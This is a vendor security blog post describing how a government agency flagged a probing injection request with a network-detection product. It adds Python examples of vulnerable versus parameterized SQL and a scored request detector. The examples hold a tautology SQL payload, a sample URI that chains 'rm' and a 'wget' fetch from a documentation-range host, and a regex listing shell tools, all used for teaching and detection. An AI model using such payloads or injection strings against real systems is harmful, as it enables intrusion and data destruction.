Blog
SQL Injection Attack Example: Government Agency Detects Anomalous Queries
ExtraHop
May 21, 2021
Security threat detection is hard. Between the knowns and unknowns, every moment is critical, especially if your data is at risk.
SQL injection attacks (SQLi) were one of the main sources of data breaches in 2020. The attack works because a SQL statement carries its control structure and its data in the same string: when untrusted input is concatenated into a query, the database parser cannot tell where the developer's SQL ends and the attacker's begins. An attacker who exploits this can read or delete your organization's data, deface a website, or use the database server as a foothold for further attacks.
Injection vulnerabilities are widespread in web applications, and the risks are well documented. Detecting SQLi by pattern matching, however, is notoriously difficult: the signature rules most tools rely on are usually too noisy to be effective in a real-world deployment, so security teams learn to tune out the alerts. An injection that goes undetected can be the perfect storm that leaves behind a wake of devastating damage.
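To make the control-versus-data point concrete, here is an added example (not code from the original post) that runs the same user lookup two ways against a constructed in-memory SQLite table: once by splicing the caller's input into the query text, once with a bound parameter. The table contents, the `find_user_*` function names and the payload are assumptions chosen for illustration.

```python
import sqlite3


def make_db():
    # Constructed sample table for this added example; not data from the post.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "admin"), (2, "bob", "user")],
    )
    return conn


def find_user_vulnerable(conn, name):
    # The caller's text becomes part of the SQL source, so the database parser
    # treats any quotes or keywords in it as syntax: control and data share one channel.
    sql = f"SELECT name, role FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, name):
    # The statement shape is fixed before any value is seen; the value is bound
    # separately and can only ever be compared as a string, never parsed as SQL.
    sql = "SELECT name, role FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


# Classic tautology payload: closes the quoted literal, then appends an OR clause
# that is true for every row. (Assumed attacker input for the example.)
PAYLOAD = "x' OR '1'='1"


def demo():
    conn = make_db()
    return {
        "vulnerable": find_user_vulnerable(conn, PAYLOAD),  # every row comes back
        "safe": find_user_safe(conn, PAYLOAD),              # no user has that literal name
        "legitimate": find_user_safe(conn, "alice"),        # normal lookup still works
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:>10}: {rows}")
```

The vulnerable path returns both users because the payload rewrites the WHERE clause; the parameterized path returns nothing because the whole payload is compared as a name. The payload deliberately avoids a stacked `; DROP TABLE` because the sqlite3 module refuses to run more than one statement per `execute()` call; other drivers and databases do not all have that guard, which is why the fix is parameterization, not relying on driver behavior.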
Detecting Anomalies
Recently, a US government agency detected a potential SQLi attack during a data review session using ExtraHop Reveal(x). Reveal(x) uses machine learning to establish a baseline of normal network behavior from observed traffic and records that baseline, so that deviations from it can be tracked over time and shared with the team.
For the agency, Reveal(x) surfaced several unusual indicators in a single request. The query contained what appeared to be a UNIX 'rm' command, used to delete files, and seemed to be aimed at a gateway. The oddities continued with a 'wget' statement, used to fetch files from a remote server, and a reference to a Netgear device, none of which belong in a legitimate query parameter. To top it off, the request came from an external client IP address geolocated in another country.
Because the server answered with an HTTP 404, the request was most likely a probe, a knock on the door rather than a successful compromise: the requested path was not served. A 404 is evidence that the probe did not land, not proof that nothing ran, so the agency kept looking and also found several inbound SSH sessions from the same country. The agency took immediate action by deploying firewall policies against the source, and then validated that the suspicious traffic had stopped.
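The indicators the agency saw (shell commands inside a query string, a device vendor name, an external client in another country, a 404 response, and parallel inbound SSH from the same country) can be expressed as a small scored detector run over request records. The following is an added example written for this post, not Reveal(x) logic, and not the agency's data: the request and SSH session records, their field names, the weights and the alert threshold are all constructed assumptions, and the addresses come from the RFC 5737 documentation ranges.

```python
import ipaddress
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample telemetry for this added example (RFC 5737 documentation
# addresses, made-up geolocation codes); not data from the agency or from Reveal(x).
HOME_GEO = "HOME"
HTTP_REQUESTS = [
    {"src": "203.0.113.45", "geo": "XX", "status": 404,
     "uri": "/gateway?device=netgear&id=1;rm+-f+/tmp/a;wget+http://203.0.113.9/a"},
    {"src": "10.0.0.7", "geo": HOME_GEO, "status": 200, "uri": "/api/items?id=42"},
    {"src": "198.51.100.3", "geo": "YY", "status": 200, "uri": "/search?q=how+to+use+wget"},
]
SSH_SESSIONS = [
    {"src": "203.0.113.46", "geo": "XX", "dst": "10.0.0.20"},
    {"src": "203.0.113.50", "geo": "XX", "dst": "10.0.0.21"},
    {"src": "10.0.0.8", "geo": HOME_GEO, "dst": "10.0.0.20"},
]

# Shell commands that have no business in a query parameter, matched as whole words.
SHELL_CMD = re.compile(r"(?<![\w./-])(rm|wget|curl|chmod|nc)(?=\s|$)")
# Separators that turn a bare word into an executable chain.
SEPARATOR = re.compile(r"[;|`]|&&|\$\(")
DEVICE_HINT = re.compile(r"netgear", re.IGNORECASE)

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    """RFC 1918 check. ipaddress's is_private also treats the documentation
    ranges used in this sample as private, so an explicit list is used instead."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def score_request(req):
    """Weighted indicators for one HTTP request; returns (score, reasons).
    Weights are assumptions for the example, not tuned values."""
    text = unquote_plus(urlsplit(req["uri"]).query)
    score, reasons = 0, []
    cmds = sorted(set(SHELL_CMD.findall(text)))
    if cmds:
        score += 2
        reasons.append(f"shell command(s) in query: {cmds}")
        if SEPARATOR.search(text):
            score += 3
            reasons.append("command separator chains the shell command")
    if DEVICE_HINT.search(text):
        score += 1
        reasons.append("device vendor named in query")
    if not is_internal(req["src"]):
        score += 1
        reasons.append("external client")
    if req["geo"] != HOME_GEO:
        score += 1
        reasons.append("client geolocated outside home country")
    if req["status"] == 404:
        reasons.append("404 response: likely a probe, but not proof nothing ran")
    return score, reasons


def related_ssh(geo, sessions):
    """Inbound SSH sessions from external clients in the same geolocation."""
    return [s for s in sessions if s["geo"] == geo and not is_internal(s["src"])]


def triage(requests, sessions, threshold=5):
    """Alert only on requests at or above the threshold and attach SSH context."""
    alerts = []
    for req in requests:
        score, reasons = score_request(req)
        if score >= threshold:
            alerts.append({"src": req["src"], "geo": req["geo"], "score": score,
                           "reasons": reasons,
                           "related_ssh": related_ssh(req["geo"], sessions)})
    return alerts


if __name__ == "__main__":
    for alert in triage(HTTP_REQUESTS, SSH_SESSIONS):
        print(f"ALERT {alert['src']} ({alert['geo']}) score={alert['score']}")
        for reason in alert["reasons"]:
            print(f"  - {reason}")
        print(f"  inbound SSH sessions from {alert['geo']}: {len(alert['related_ssh'])}")
```

Only the first request crosses the threshold; the search query that merely mentions "wget" scores too low to alert, which is the noise problem the earlier paragraph describes in miniature. The scoring is a fixed heuristic stand-in for the learned baselines the post attributes to Reveal(x); what the example shows is the correlation step, turning one suspicious request plus same-origin SSH activity into a single alert with its supporting reasons, which is what the agency needed in order to justify the firewall block quickly.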
Simultaneous Strategies
All security teams need the ability to validate and remediate threats rapidly, just as the agency did. The challenge is that most security technology is either too blunt or inherently reactive, adding to the time it takes to study a compromise, identify attack signatures, and determine which stage the attack has reached. As SQLi attacks become more prevalent, advanced detectors must close these gaps.
When security tools such as Reveal(x) apply advanced behavioral analytics enabled by machine learning, security teams can close network blind spots. They can also cut the noise from false positives, and detect, investigate, and respond to threats faster and more efficiently.
The security team at the government agency defended against SQLi with the help of complete network visibility and high-fidelity, behavior-based detectors that automatically and accurately alerted them to a threat before any damage was done. When faced with what could have been a damaging attack, Reveal(x) allowed the security team to quickly respond and stop it.
What could you detect with Reveal(x)? Find out by exploring the full platform running on example data in the Reveal(x) demo.
Discover more